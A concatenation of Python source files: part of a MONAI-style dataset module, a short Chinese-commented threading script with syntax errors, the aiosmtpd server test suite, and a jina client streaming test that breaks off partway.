self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
remain_num: int = self.cache_num - self._replace_num
for i in range(remain_num):
self._cache[i] = self._cache[i + self._replace_num]
for i in range(self._replace_num):
self._cache[remain_num + i] = self._replacements[i]
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min((len(dataset) for dataset in self.data))
def __getitem__(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, RandomizableTransform):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, RandomizableTransform):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
|
project.py | '''
这一文件是总控制程序,它的工作原理为:
创建线程池
调用GUI绘制程序
调用面部识别(关于这一功能还存在疑问,但是还是先试验一下线程流畅性)
GUI界面的交互按钮将在被唤醒时开启舵机/电机控制程序以及时间控制程序
GUI界面始终保持运行,监听用户唤醒操作
''''
import threading
import GUI
import face_detection
def test():
print(threading.active_count()))
print(threading.enumerate())
print(threading.current_thread())
if __name__ == '__main__':
screen_GUI = threading.Thread(target = 1.Screen_Function)
screen_GUI.start()
face_recognition = threading.Thread(target = 2.Face_Detection)
face_recognition.start()
# 需要注意人脸识别这里,看一看它要吃多少计算资源
|
test_server.py | # Copyright 2014-2021 The aiosmtpd Developers
# SPDX-License-Identifier: Apache-2.0
"""Test other aspects of the server implementation."""
import asyncio
import errno
import platform
import socket
import time
from contextlib import ExitStack
from functools import partial
from threading import Event
from pathlib import Path
from smtplib import SMTP as SMTPClient, SMTPServerDisconnected
from tempfile import mkdtemp
from threading import Thread
from typing import Generator, Optional
import pytest
from pytest_mock import MockFixture
from aiosmtpd.controller import (
Controller,
UnixSocketController,
UnthreadedController,
UnixSocketMixin,
UnixSocketUnthreadedController,
_FakeServer,
get_localhost,
)
from aiosmtpd.handlers import Sink
from aiosmtpd.smtp import SMTP as Server
from aiosmtpd.testing.helpers import catchup_delay
from .conftest import Global, AUTOSTOP_DELAY
class SlowStartController(Controller):
def __init__(self, *args, **kwargs):
kwargs.setdefault("ready_timeout", 0.5)
super().__init__(*args, **kwargs)
def _run(self, ready_event: Event):
time.sleep(self.ready_timeout * 1.5)
super()._run(ready_event)
class SlowFactoryController(Controller):
def __init__(self, *args, **kwargs):
kwargs.setdefault("ready_timeout", 0.5)
super().__init__(*args, **kwargs)
def factory(self):
time.sleep(self.ready_timeout * 3)
return super().factory()
def _factory_invoker(self):
time.sleep(self.ready_timeout * 3)
return super()._factory_invoker()
def in_win32():
return platform.system().casefold() == "windows"
def in_wsl():
# WSL 1.0 somehow allows more than one listener on one port.
# So we have to detect when we're running on WSL so we can skip some tests.
# On Windows, platform.release() returns the Windows version (e.g., "7" or "10")
# On Linux (incl. WSL), platform.release() returns the kernel version.
# As of 2021-02-07, only WSL has a kernel with "Microsoft" in the version.
return "microsoft" in platform.release().casefold()
def in_cygwin():
return platform.system().casefold().startswith("cygwin")
@pytest.fixture(scope="module")
def safe_socket_dir() -> Generator[Path, None, None]:
# See:
# - https://github.com/aio-libs/aiohttp/issues/3572
# - https://github.com/aio-libs/aiohttp/pull/3832/files
# - https://unix.stackexchange.com/a/367012/5589
tmpdir = Path(mkdtemp()).absolute()
assert len(str(tmpdir)) <= 87 # 92 (max on HP-UX) minus 5 (allow 4-char fn)
#
yield tmpdir
#
plist = list(tmpdir.rglob("*"))
for p in reversed(plist):
if p.is_dir():
p.rmdir()
else:
p.unlink()
tmpdir.rmdir()
def assert_smtp_socket(controller: UnixSocketMixin) -> bool:
assert Path(controller.unix_socket).exists()
sockfile = controller.unix_socket
ssl_context = controller.ssl_context
with ExitStack() as stk:
sock: socket.socket = stk.enter_context(
socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
)
sock.settimeout(AUTOSTOP_DELAY)
sock.connect(str(sockfile))
if ssl_context:
sock = stk.enter_context(ssl_context.wrap_socket(sock))
catchup_delay()
try:
resp = sock.recv(1024)
except socket.timeout:
return False
if not resp:
return False
assert resp.startswith(b"220 ")
assert resp.endswith(b"\r\n")
sock.send(b"EHLO socket.test\r\n")
# We need to "build" resparr because, especially when socket is wrapped
# in SSL, the SMTP server takes it sweet time responding with the list
# of ESMTP features ...
resparr = bytearray()
while not resparr.endswith(b"250 HELP\r\n"):
catchup_delay()
resp = sock.recv(1024)
if not resp:
break
resparr += resp
assert resparr.endswith(b"250 HELP\r\n")
sock.send(b"QUIT\r\n")
catchup_delay()
resp = sock.recv(1024)
assert resp.startswith(b"221")
return True
class TestServer:
"""Tests for the aiosmtpd.smtp.SMTP class"""
def test_smtp_utf8(self, plain_controller, client):
code, mesg = client.ehlo("example.com")
assert code == 250
assert b"SMTPUTF8" in mesg.splitlines()
def test_default_max_command_size_limit(self):
server = Server(Sink())
assert server.max_command_size_limit == 512
def test_special_max_command_size_limit(self):
server = Server(Sink())
server.command_size_limits["DATA"] = 1024
assert server.max_command_size_limit == 1024
def test_warn_authreq_notls(self):
expectedre = (
r"Requiring AUTH while not requiring TLS can lead to "
r"security vulnerabilities!"
)
with pytest.warns(UserWarning, match=expectedre):
Server(Sink(), auth_require_tls=False, auth_required=True)
class TestController:
"""Tests for the aiosmtpd.controller.Controller class"""
@pytest.mark.filterwarnings("ignore")
def test_ready_timeout(self):
cont = SlowStartController(Sink())
expectre = (
"SMTP server failed to start within allotted time. "
"This might happen if the system is too busy. "
"Try increasing the `ready_timeout` parameter."
)
try:
with pytest.raises(TimeoutError, match=expectre):
cont.start()
finally:
cont.stop()
@pytest.mark.filterwarnings("ignore")
def test_factory_timeout(self):
cont = SlowFactoryController(Sink())
expectre = (
r"SMTP server started, but not responding within allotted time. "
r"This might happen if the system is too busy. "
r"Try increasing the `ready_timeout` parameter."
)
try:
with pytest.raises(TimeoutError, match=expectre):
cont.start()
finally:
cont.stop()
def test_reuse_loop(self, temp_event_loop):
cont = Controller(Sink(), loop=temp_event_loop)
assert cont.loop is temp_event_loop
try:
cont.start()
assert cont.smtpd.loop is temp_event_loop
finally:
cont.stop()
@pytest.mark.skipif(in_wsl(), reason="WSL prevents socket collision")
def test_socket_error_dupe(self, plain_controller, client):
contr2 = Controller(
Sink(), hostname=Global.SrvAddr.host, port=Global.SrvAddr.port
)
expectedre = r"error while attempting to bind on address"
try:
with pytest.raises(socket.error, match=expectedre):
contr2.start()
finally:
contr2.stop()
@pytest.mark.skipif(in_wsl(), reason="WSL prevents socket collision")
def test_socket_error_default(self):
contr1 = Controller(Sink())
contr2 = Controller(Sink())
expectedre = r"error while attempting to bind on address"
try:
with pytest.raises(socket.error, match=expectedre):
contr1.start()
contr2.start()
finally:
contr2.stop()
contr1.stop()
def test_server_attribute(self):
controller = Controller(Sink())
assert controller.server is None
try:
controller.start()
assert controller.server is not None
finally:
controller.stop()
assert controller.server is None
@pytest.mark.filterwarnings(
"ignore:server_kwargs will be removed:DeprecationWarning"
)
def test_enablesmtputf8_flag(self):
# Default is True
controller = Controller(Sink())
assert controller.SMTP_kwargs["enable_SMTPUTF8"]
# Explicit set must be reflected in server_kwargs
controller = Controller(Sink(), enable_SMTPUTF8=True)
assert controller.SMTP_kwargs["enable_SMTPUTF8"]
controller = Controller(Sink(), enable_SMTPUTF8=False)
assert not controller.SMTP_kwargs["enable_SMTPUTF8"]
# Explicit set must override server_kwargs
kwargs = dict(enable_SMTPUTF8=False)
controller = Controller(Sink(), enable_SMTPUTF8=True, server_kwargs=kwargs)
assert controller.SMTP_kwargs["enable_SMTPUTF8"]
kwargs = dict(enable_SMTPUTF8=True)
controller = Controller(Sink(), enable_SMTPUTF8=False, server_kwargs=kwargs)
assert not controller.SMTP_kwargs["enable_SMTPUTF8"]
# Set through server_kwargs must not be overridden if no explicit set
kwargs = dict(enable_SMTPUTF8=False)
controller = Controller(Sink(), server_kwargs=kwargs)
assert not controller.SMTP_kwargs["enable_SMTPUTF8"]
@pytest.mark.filterwarnings(
"ignore:server_kwargs will be removed:DeprecationWarning"
)
def test_serverhostname_arg(self):
contsink = partial(Controller, Sink())
controller = contsink()
assert "hostname" not in controller.SMTP_kwargs
controller = contsink(server_hostname="testhost1")
assert controller.SMTP_kwargs["hostname"] == "testhost1"
kwargs = dict(hostname="testhost2")
controller = contsink(server_kwargs=kwargs)
assert controller.SMTP_kwargs["hostname"] == "testhost2"
controller = contsink(server_hostname="testhost3", server_kwargs=kwargs)
assert controller.SMTP_kwargs["hostname"] == "testhost3"
def test_hostname_empty(self):
# WARNING: This test _always_ succeeds in Windows.
cont = Controller(Sink(), hostname="")
try:
cont.start()
finally:
cont.stop()
def test_hostname_none(self):
cont = Controller(Sink())
try:
cont.start()
finally:
cont.stop()
def test_testconn_raises(self, mocker: MockFixture):
mocker.patch("socket.socket.recv", side_effect=RuntimeError("MockError"))
cont = Controller(Sink(), hostname="")
try:
with pytest.raises(RuntimeError, match="MockError"):
cont.start()
finally:
cont.stop()
def test_getlocalhost(self):
assert get_localhost() in ("127.0.0.1", "::1")
def test_getlocalhost_noipv6(self, mocker):
mock_hasip6 = mocker.patch("aiosmtpd.controller._has_ipv6", return_value=False)
assert get_localhost() == "127.0.0.1"
assert mock_hasip6.called
def test_getlocalhost_6yes(self, mocker: MockFixture):
mock_sock = mocker.Mock()
mock_makesock: mocker.Mock = mocker.patch("aiosmtpd.controller.makesock")
mock_makesock.return_value.__enter__.return_value = mock_sock
assert get_localhost() == "::1"
mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)
assert mock_sock.bind.called
# Apparently errno.E* constants adapts to the OS, so on Windows they will
# automatically use the analogous WSAE* constants
@pytest.mark.parametrize("err", [errno.EADDRNOTAVAIL, errno.EAFNOSUPPORT])
def test_getlocalhost_6no(self, mocker, err):
mock_makesock: mocker.Mock = mocker.patch(
"aiosmtpd.controller.makesock",
side_effect=OSError(errno.EADDRNOTAVAIL, "Mock IP4-only"),
)
assert get_localhost() == "127.0.0.1"
mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)
def test_getlocalhost_6inuse(self, mocker):
mock_makesock: mocker.Mock = mocker.patch(
"aiosmtpd.controller.makesock",
side_effect=OSError(errno.EADDRINUSE, "Mock IP6 used"),
)
assert get_localhost() == "::1"
mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)
def test_getlocalhost_error(self, mocker):
mock_makesock: mocker.Mock = mocker.patch(
"aiosmtpd.controller.makesock",
side_effect=OSError(errno.EFAULT, "Mock Error"),
)
with pytest.raises(OSError, match="Mock Error") as exc:
get_localhost()
assert exc.value.errno == errno.EFAULT
mock_makesock.assert_called_with(socket.AF_INET6, socket.SOCK_STREAM)
def test_stop_default(self):
controller = Controller(Sink())
with pytest.raises(AssertionError, match="SMTP daemon not running"):
controller.stop()
def test_stop_assert(self):
controller = Controller(Sink())
with pytest.raises(AssertionError, match="SMTP daemon not running"):
controller.stop(no_assert=False)
def test_stop_noassert(self):
controller = Controller(Sink())
controller.stop(no_assert=True)
@pytest.mark.skipif(in_cygwin(), reason="Cygwin AF_UNIX is problematic")
@pytest.mark.skipif(in_win32(), reason="Win32 does not yet fully implement AF_UNIX")
class TestUnixSocketController:
def test_server_creation(self, safe_socket_dir):
sockfile = safe_socket_dir / "smtp"
cont = UnixSocketController(Sink(), unix_socket=sockfile)
try:
cont.start()
assert_smtp_socket(cont)
finally:
cont.stop()
def test_server_creation_ssl(self, safe_socket_dir, ssl_context_server):
sockfile = safe_socket_dir / "smtp"
cont = UnixSocketController(
Sink(), unix_socket=sockfile, ssl_context=ssl_context_server
)
try:
cont.start()
# Allow additional time for SSL to kick in
catchup_delay()
assert_smtp_socket(cont)
finally:
cont.stop()
class TestUnthreaded:
@pytest.fixture
def runner(self):
thread: Optional[Thread] = None
def _runner(loop: asyncio.AbstractEventLoop):
loop.run_forever()
def starter(loop: asyncio.AbstractEventLoop):
nonlocal thread
thread = Thread(target=_runner, args=(loop,))
thread.setDaemon(True)
thread.start()
catchup_delay()
def joiner(timeout: float = None):
nonlocal thread
assert isinstance(thread, Thread)
thread.join(timeout=timeout)
def is_alive():
nonlocal thread
assert isinstance(thread, Thread)
return thread.is_alive()
starter.join = joiner
starter.is_alive = is_alive
return starter
@pytest.mark.skipif(in_cygwin(), reason="Cygwin AF_UNIX is problematic")
@pytest.mark.skipif(in_win32(), reason="Win32 does not yet fully implement AF_UNIX")
def test_unixsocket(self, safe_socket_dir, autostop_loop, runner):
sockfile = safe_socket_dir / "smtp"
cont = UnixSocketUnthreadedController(
Sink(), unix_socket=sockfile, loop=autostop_loop
)
cont.begin()
# Make sure event loop is not running (will be started in thread)
assert autostop_loop.is_running() is False
runner(autostop_loop)
# Make sure event loop is up and running (started within thread)
assert autostop_loop.is_running() is True
# Check we can connect
assert_smtp_socket(cont)
# Wait until thread ends, which it will be when the loop autostops
runner.join(timeout=AUTOSTOP_DELAY)
assert runner.is_alive() is False
catchup_delay()
assert autostop_loop.is_running() is False
# At this point, the loop _has_ stopped, but the task is still listening
assert assert_smtp_socket(cont) is False
# Stop the task
cont.end()
catchup_delay()
# Now the listener has gone away
# noinspection PyTypeChecker
with pytest.raises((socket.timeout, ConnectionError)):
assert_smtp_socket(cont)
@pytest.mark.filterwarnings(
"ignore::pytest.PytestUnraisableExceptionWarning"
)
def test_inet_loopstop(self, autostop_loop, runner):
"""
Verify behavior when the loop is stopped before controller is stopped
"""
autostop_loop.set_debug(True)
cont = UnthreadedController(Sink(), loop=autostop_loop)
cont.begin()
# Make sure event loop is not running (will be started in thread)
assert autostop_loop.is_running() is False
runner(autostop_loop)
# Make sure event loop is up and running (started within thread)
assert autostop_loop.is_running() is True
# Check we can connect
with SMTPClient(cont.hostname, cont.port, timeout=AUTOSTOP_DELAY) as client:
code, _ = client.helo("example.org")
assert code == 250
# Wait until thread ends, which it will be when the loop autostops
runner.join(timeout=AUTOSTOP_DELAY)
assert runner.is_alive() is False
catchup_delay()
assert autostop_loop.is_running() is False
# At this point, the loop _has_ stopped, but the task is still listening,
# so rather than socket.timeout, we'll get a refusal instead, thus causing
# SMTPServerDisconnected
with pytest.raises(SMTPServerDisconnected):
SMTPClient(cont.hostname, cont.port, timeout=0.1)
cont.end()
catchup_delay()
cont.ended.wait()
# Now the listener has gone away, and thus we will end up with socket.timeout
# or ConnectionError (depending on OS)
# noinspection PyTypeChecker
with pytest.raises((socket.timeout, ConnectionError)):
SMTPClient(cont.hostname, cont.port, timeout=0.1)
@pytest.mark.filterwarnings(
"ignore::pytest.PytestUnraisableExceptionWarning"
)
def test_inet_contstop(self, temp_event_loop, runner):
"""
Verify behavior when the controller is stopped before loop is stopped
"""
cont = UnthreadedController(Sink(), loop=temp_event_loop)
cont.begin()
# Make sure event loop is not running (will be started in thread)
assert temp_event_loop.is_running() is False
runner(temp_event_loop)
# Make sure event loop is up and running
assert temp_event_loop.is_running() is True
try:
# Check that we can connect
with SMTPClient(cont.hostname, cont.port, timeout=AUTOSTOP_DELAY) as client:
code, _ = client.helo("example.org")
assert code == 250
client.quit()
catchup_delay()
temp_event_loop.call_soon_threadsafe(cont.end)
for _ in range(10): # 10 is arbitrary
catchup_delay() # effectively yield to other threads/event loop
if cont.ended.wait(1.0):
break
assert temp_event_loop.is_running() is True
# Because we've called .end() there, the server listener should've gone
# away, so we should end up with a socket.timeout or ConnectionError or
# SMTPServerDisconnected (depending on lotsa factors)
expect_errs = (socket.timeout, ConnectionError, SMTPServerDisconnected)
# noinspection PyTypeChecker
with pytest.raises(expect_errs):
SMTPClient(cont.hostname, cont.port, timeout=0.1)
finally:
# Wrap up, or else we'll hang
temp_event_loop.call_soon_threadsafe(cont.cancel_tasks)
catchup_delay()
runner.join()
assert runner.is_alive() is False
assert temp_event_loop.is_running() is False
assert temp_event_loop.is_closed() is False
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
class TestFactory:
def test_normal_situation(self):
cont = Controller(Sink())
try:
cont.start()
catchup_delay()
assert cont.smtpd is not None
assert cont._thread_exception is None
finally:
cont.stop()
def test_unknown_args_direct(self, silence_event_loop_closed: bool):
unknown = "this_is_an_unknown_kwarg"
cont = Controller(Sink(), ready_timeout=0.3, **{unknown: True})
expectedre = r"__init__.. got an unexpected keyword argument '" + unknown + r"'"
try:
with pytest.raises(TypeError, match=expectedre):
cont.start()
assert cont.smtpd is None
assert isinstance(cont._thread_exception, TypeError)
finally:
cont.stop()
@pytest.mark.filterwarnings(
"ignore:server_kwargs will be removed:DeprecationWarning"
)
def test_unknown_args_inkwargs(self, silence_event_loop_closed: bool):
unknown = "this_is_an_unknown_kwarg"
cont = Controller(Sink(), ready_timeout=0.3, server_kwargs={unknown: True})
expectedre = r"__init__.. got an unexpected keyword argument '" + unknown + r"'"
try:
with pytest.raises(TypeError, match=expectedre):
cont.start()
assert cont.smtpd is None
finally:
cont.stop()
def test_factory_none(self, mocker: MockFixture, silence_event_loop_closed: bool):
# Hypothetical situation where factory() did not raise an Exception
# but returned None instead
mocker.patch("aiosmtpd.controller.SMTP", return_value=None)
cont = Controller(Sink(), ready_timeout=0.3)
expectedre = r"factory\(\) returned None"
try:
with pytest.raises(RuntimeError, match=expectedre):
cont.start()
assert cont.smtpd is None
finally:
cont.stop()
def test_noexc_smtpd_missing(
self, mocker: MockFixture, silence_event_loop_closed: bool
):
# Hypothetical situation where factory() failed but no
# Exception was generated.
cont = Controller(Sink())
def hijacker(*args, **kwargs):
cont._thread_exception = None
# Must still return an (unmocked) _FakeServer to prevent a whole bunch
# of messy exceptions, although they doesn't affect the test at all.
return _FakeServer(cont.loop)
mocker.patch("aiosmtpd.controller._FakeServer", side_effect=hijacker)
mocker.patch(
"aiosmtpd.controller.SMTP", side_effect=RuntimeError("Simulated Failure")
)
expectedre = r"Unknown Error, failed to init SMTP server"
try:
with pytest.raises(RuntimeError, match=expectedre):
cont.start()
assert cont.smtpd is None
assert cont._thread_exception is None
finally:
cont.stop()
class TestCompat:
def test_version(self):
from aiosmtpd import __version__ as init_version
from aiosmtpd.smtp import __version__ as smtp_version
assert smtp_version is init_version
|
test_clients_streaming.py | import asyncio
import os
import time
from datetime import datetime
from functools import partial
from multiprocessing import Process, current_process
from typing import List
import pytest
from jina import Client, Document, DocumentArray, Executor, Flow, requests
INPUT_LEN = 4
INPUT_GEN_SLEEP_TIME = 1
SLOW_EXECUTOR_SLEEP_TIME = 5
def readable_time_from(t):
return datetime.utcfromtimestamp(t).strftime('%M:%S:%f')
def get_document(i, name):
t = time.time()
print(f'in {name} {i}, time: {readable_time_from(t)}, {t}', flush=True)
return Document(id=f'id-{i}', tags={'input_gen': t})
def blocking_gen():
"""Fast synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='blocking_gen')
time.sleep(0.1)
async def async_gen():
"""Fast async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='async_gen')
await asyncio.sleep(0.1)
def slow_blocking_gen():
"""Slow synchronous client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_blocking_gen')
time.sleep(INPUT_GEN_SLEEP_TIME)
async def slow_async_gen():
"""Slow async client generator"""
for i in range(INPUT_LEN):
yield get_document(i, name='slow_async_gen')
await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
class FastExecutor(Executor):
"""Fast Executor"""
@requests
def foo(self, docs: DocumentArray, **kwargs):
for doc in docs:
doc.tags['executor'] = time.time()
print(
f'in FastExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}',
flush=True,
)
class SlowExecutor(Executor):
"""Slow Executor (sleeps DELAYED_EXECUTOR_SLEEP_TIME secs b/w each req)"""
@requests
def foo(self, docs: DocumentArray, **kwargs):
time.sleep(SLOW_EXECUTOR_SLEEP_TIME)
for doc in docs:
doc.tags['executor'] = time.time()
print(
f'in SlowExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}',
flush=True,
)
def on_done(response, final_da: DocumentArray):
print(f' receiving response {response._pb_body.header.request_id}')
docs = response.docs
for doc in docs:
doc.tags['on_done'] = time.time()
print(
f'in on_done {doc.id}, time: {readable_time_from(doc.tags["on_done"])}, {doc.tags["on_done"]}',
flush=True,
)
final_da.extend(docs)
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', slow_async_gen),
pytest.param(
'grpc',
slow_blocking_gen,
marks=pytest.mark.skip(
reason='grpc client + sync generator with time.sleep is expected to fail'
),
),
('websocket', slow_async_gen),
('websocket', slow_blocking_gen),
('http', slow_async_gen),
('http', slow_blocking_gen),
],
)
def test_disable_prefetch_slow_client_fast_executor(protocol, inputs):
print(
f'\n\nRunning disable prefetch, slow client, fast Executor test for \n'
f'protocol: {protocol}, input: {inputs.__name__}'
)
final_da = DocumentArray()
with Flow(protocol=protocol).add(uses=FastExecutor) as f:
f.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
assert len(final_da) == INPUT_LEN
# Since the input_gen is slow, order will always be gen -> exec -> on_done for every request
assert final_da['id-0'].tags['input_gen'] < final_da['id-0'].tags['executor']
assert final_da['id-0'].tags['executor'] < final_da['id-0'].tags['on_done']
assert final_da['id-0'].tags['on_done'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-1'].tags['executor']
assert final_da['id-1'].tags['executor'] < final_da['id-1'].tags['on_done']
assert final_da['id-1'].tags['on_done'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-2'].tags['executor']
assert final_da['id-2'].tags['executor'] < final_da['id-2'].tags['on_done']
assert final_da['id-2'].tags['on_done'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-3'].tags['executor']
assert final_da['id-3'].tags['executor'] < final_da['id-3'].tags['on_done']
@pytest.mark.parametrize(
'protocol, inputs',
[
('grpc', async_gen),
('grpc', blocking_gen),
('websocket', async_gen),
('websocket', blocking_gen),
('http', async_gen),
('http', blocking_gen),
],
)
def test_disable_prefetch_fast_client_slow_executor(protocol, inputs):
print(
f'\n\nRunning disable prefetch, fast client, slow Executor test for \n'
f'protocol: {protocol}, input: {inputs.__name__}'
)
final_da = DocumentArray()
with Flow(protocol=protocol).add(uses=SlowExecutor) as f:
f.post(
on='/',
inputs=inputs,
request_size=1,
on_done=lambda response: on_done(response, final_da),
)
assert len(final_da) == INPUT_LEN
# since Executor is slow, all client inputs should be read before 1st request exits from Executor.
assert (
final_da['id-0'].id < final_da['id-1'].id
), f'ids are not ordered with times {final_da["id-0"].tags["input_gen"]} and {final_da["id-1"].tags["input_gen"]}'
assert (
final_da['id-1'].id < final_da['id-2'].id
), f'ids are not ordered with times {final_da["id-1"].tags["input_gen"]} and {final_da["id-2"].tags["input_gen"]}'
assert (
final_da['id-2'].id < final_da['id-3'].id
), f'ids are not ordered with times {final_da["id-2"].tags["input_gen"]} and {final_da["id-3"].tags["input_gen"]}'
assert final_da['id-0'].tags['input_gen'] < final_da['id-1'].tags['input_gen']
assert final_da['id-1'].tags['input_gen'] < final_da['id-2'].tags['input_gen']
assert final_da['id-2'].tags['input_gen'] < final_da['id-3'].tags['input_gen']
assert final_da['id-3'].tags['input_gen'] < final_da['id-0'].tags['executor']
# At least 1 request should reache `on_done` before all requests are processed in the Executor.
# Validates that the requests are not pending at the Executor
first_on_done_time = min(i.tags['on_done'] for i in final_da)
last_executor_time = max(i.tags['executor'] for i in final_da)
assert first_on_done_time < last_executor_time
class Indexer(Executor):
docs = DocumentArray()
@requests(on='/index')
def index(self, docs: DocumentArray, **kwargs):
time.sleep(0.1)
self.docs.extend(docs)
@requests(on='/status')
def status(self, **kwargs):
# returns ids of all docs in tags
return DocumentArray(Document(tags={'ids': self.docs[:, 'id']}))
@pytest.fixture()
def info_log_level():
log_level = os.environ['JINA_LOG_LEVEL']
os.environ['JINA_LOG_LEVEL'] = 'INFO'
yield
os.environ['JINA_LOG_LEVEL'] = log_level
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
def test_multiple_clients(prefetch, protocol, info_log_level):
GOOD_CLIENTS = 5
GOOD_CLIENT_NUM_DOCS = 20
MALICIOUS_CLIENT_NUM_DOCS = 50
def get_document(i):
return Document(
id=f'{current_process().name}_{i}',
text=str(bytes(bytearray(os.urandom(512 * 4)))),
)
async def good_client_gen():
for i in range(GOOD_CLIENT_NUM_DOCS):
yield get_document(i)
await asyncio.sleep(0.1)
async def malicious_client_gen():
for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
yield get_document(i)
def client(gen, port):
Client(protocol=protocol, port=port).post(
on='/index', inputs=gen, request_size=1, return_responses=True
)
pool: List[Process] = []
